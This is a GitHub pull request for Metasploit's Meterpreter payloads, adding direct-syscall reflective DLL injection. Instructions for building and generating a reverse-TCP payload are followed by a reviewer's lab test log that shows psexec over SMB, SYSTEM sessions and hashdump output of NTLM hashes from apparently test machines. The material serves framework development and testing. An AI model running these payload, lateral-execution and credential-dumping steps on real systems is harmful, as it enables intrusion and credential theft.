Pull in changes from ReflectiveDLLInjection to support direct syscalls (2)

rapid7 / metasploit-payloads

Unified repository for different Metasploit Framework payloads

Other

1.75k stars 673 forks source link

Pull in changes from ReflectiveDLLInjection to support direct syscalls (2) #694

Closed cdelafuente-r7 closed 10 months ago

cdelafuente-r7 commented 10 months ago

This PR adds the necessary changes to support the direct syscalls version of ReflectiveDLLInjection. This is a new implementation based on this first PR. At this time, the related PR in ReflectiveDLLInjection repository is still under review but it is possible to test by updating the ReflectiveDLLInjection submodule reference:

cd c/meterpreter/source/ReflectiveDLLInjection
git remote add rdi_direct_syscalls git@github.com:cdelafuente-r7/ReflectiveDLLInjection.git
git fetch rdi_direct_syscalls
git checkout rdi_direct_syscalls/direct_syscalls_fix_win10x86

Don't forget to git fetch/git checkout again if the ReflectiveDLLInjection branch is updated.

Follow the standard documentation to build Meterpreter on Windows and with MinGW.

Testing with MSF

Once the DLL's are built, you need to copy output/ directory content into the Metasploit Framework's data/meterpreter/ directory.

Then in MSF console, test Meterpreter payloads (staged and single). For example:

use windows/x64/meterpreter_reverse_tcp
set LHOST <your host IP>
generate -f exe -o direct_syscalls_payload.exe
to_handler
move direct_syscalls_payload.exe to the target and execute it, you should get a session.
make sure you get the warning saying local DLLs are being used: WARNING: Local file .../data/meterpreter/ext_server_stdapi.x64.dll is being used
make sure you load extensions, migrate, getsystem, etc. without issues.

bwatters-r7 commented 10 months ago

Windows 10x64

``` msf6 exploit(windows/smb/psexec) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN10X64_1803 10.5.135.201:4444 -> 10.5.134.132:50116 (10.5.134.132) 2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN10X64_1511 10.5.135.201:4444 -> 10.5.134.145:49734 (10.5.134.145) 3 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN10X64 10.5.135.201:4444 -> 10.5.134.149:49492 (10.5.134.149) 4 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN10X64_1709 10.5.135.201:4444 -> 10.5.134.150:49757 (10.5.134.150) 5 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN10X64_20H2 10.5.135.201:4444 -> 10.5.134.151:49855 (10.5.134.151) 6 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN10X64_1809 10.5.135.201:4444 -> 10.5.134.152:50667 (10.5.134.152) 7 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN10X64_2004 10.5.135.201:4444 -> 10.5.134.157:49836 (10.5.134.157) 8 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN10X64_1607 10.5.135.201:4444 -> 10.5.134.171:49751 (10.5.134.171) 9 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN10X64_21H1 10.5.135.201:4444 -> 10.5.134.192:50044 (10.5.134.192) msf6 exploit(windows/smb/psexec) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 1 (10.5.134.132) Computer : WIN10X64_1803 OS : Windows 10 (10.0 Build 17134). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 2 (10.5.134.145) Computer : WIN10X64_1511 OS : Windows 10 (10.0 Build 10586). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 3 (10.5.134.149) Computer : WIN10X64 OS : Windows 10 (10.0 Build 10240). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 4 (10.5.134.150) Computer : WIN10X64_1709 OS : Windows 10 (10.0 Build 16299). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 5 (10.5.134.151) Computer : WIN10X64_20H2 OS : Windows 10 (10.0 Build 19042). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 6 (10.5.134.152) Computer : WIN10X64_1809 OS : Windows 10 (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 7 (10.5.134.157) Computer : WIN10X64_2004 OS : Windows 10 (10.0 Build 19041). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 8 (10.5.134.171) Computer : WIN10X64_1607 OS : Windows 10 (10.0 Build 14393). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 9 (10.5.134.192) Computer : WIN10X64_21H1 OS : Windows 10 (10.0 Build 19043). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows msf6 exploit(windows/smb/psexec) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 1 (10.5.134.132) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d8384ae77d76137afd52d904f6e23a56::: [*] Running 'hashdump' on meterpreter session 2 (10.5.134.145) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 3 (10.5.134.149) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 4 (10.5.134.150) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:96811640642b7e8a6465a8d64208da82::: [*] Running 'hashdump' on meterpreter session 5 (10.5.134.151) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:11ba4cb6993d434d8dbba9ba45fd9011::: [*] Running 'hashdump' on meterpreter session 6 (10.5.134.152) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3ef1bcaa8bac173c69ea6636117eec5c::: [*] Running 'hashdump' on meterpreter session 7 (10.5.134.157) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7ee181ddb6556b468f3af0a9036cfa5f::: [*] Running 'hashdump' on meterpreter session 8 (10.5.134.171) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 9 (10.5.134.192) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6e8ef0961855a7312b15a5b80e73c29c::: msf6 exploit(windows/smb/psexec) > sessions -C getsystem [*] Running 'getsystem' on meterpreter session 1 (10.5.134.132) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 2 (10.5.134.145) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 3 (10.5.134.149) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 4 (10.5.134.150) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 5 (10.5.134.151) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 6 (10.5.134.152) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 7 (10.5.134.157) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 8 (10.5.134.171) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 9 (10.5.134.192) [-] Already running as SYSTEM msf6 exploit(windows/smb/psexec) > ```

For what it is worth, while Win 10x64 appears to work, I'm having trouble with Win10x86. I'll dig a bit deeper tomorrow:

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] 10.5.134.199:445 - Connecting to the server...
[*] 10.5.134.199:445 - Authenticating to 10.5.134.199:445 as user 'vagrant'...
[*] 10.5.134.199:445 - Selecting PowerShell target
[*] 10.5.134.199:445 - Executing the payload...
[+] 10.5.134.199:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (185926 bytes) to 10.5.134.199
[*] 10.5.134.199 - Meterpreter session 11 closed.  Reason: Died
[-] Meterpreter session 11 is not valid and will be closed
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.193
rhost => 10.5.134.193
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] 10.5.134.193:445 - Connecting to the server...
[*] 10.5.134.193:445 - Authenticating to 10.5.134.193:445 as user 'vagrant'...
[*] 10.5.134.193:445 - Selecting PowerShell target
[*] 10.5.134.193:445 - Executing the payload...
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (185926 bytes) to 10.5.134.193
[+] 10.5.134.193:445 - Service start timed out, OK if running a command or non-service executable...
[-] Meterpreter session 12 is not valid and will be closed
[*] 10.5.134.193 - Meterpreter session 12 closed.

^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.189
rhost => 10.5.134.189
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] 10.5.134.189:445 - Connecting to the server...
[*] 10.5.134.189:445 - Authenticating to 10.5.134.189:445 as user 'vagrant'...
[*] 10.5.134.189:445 - Selecting PowerShell target
[*] 10.5.134.189:445 - Executing the payload...
[+] 10.5.134.189:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (185926 bytes) to 10.5.134.189
[-] Meterpreter session 13 is not valid and will be closed
[*] 10.5.134.189 - Meterpreter session 13 closed.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

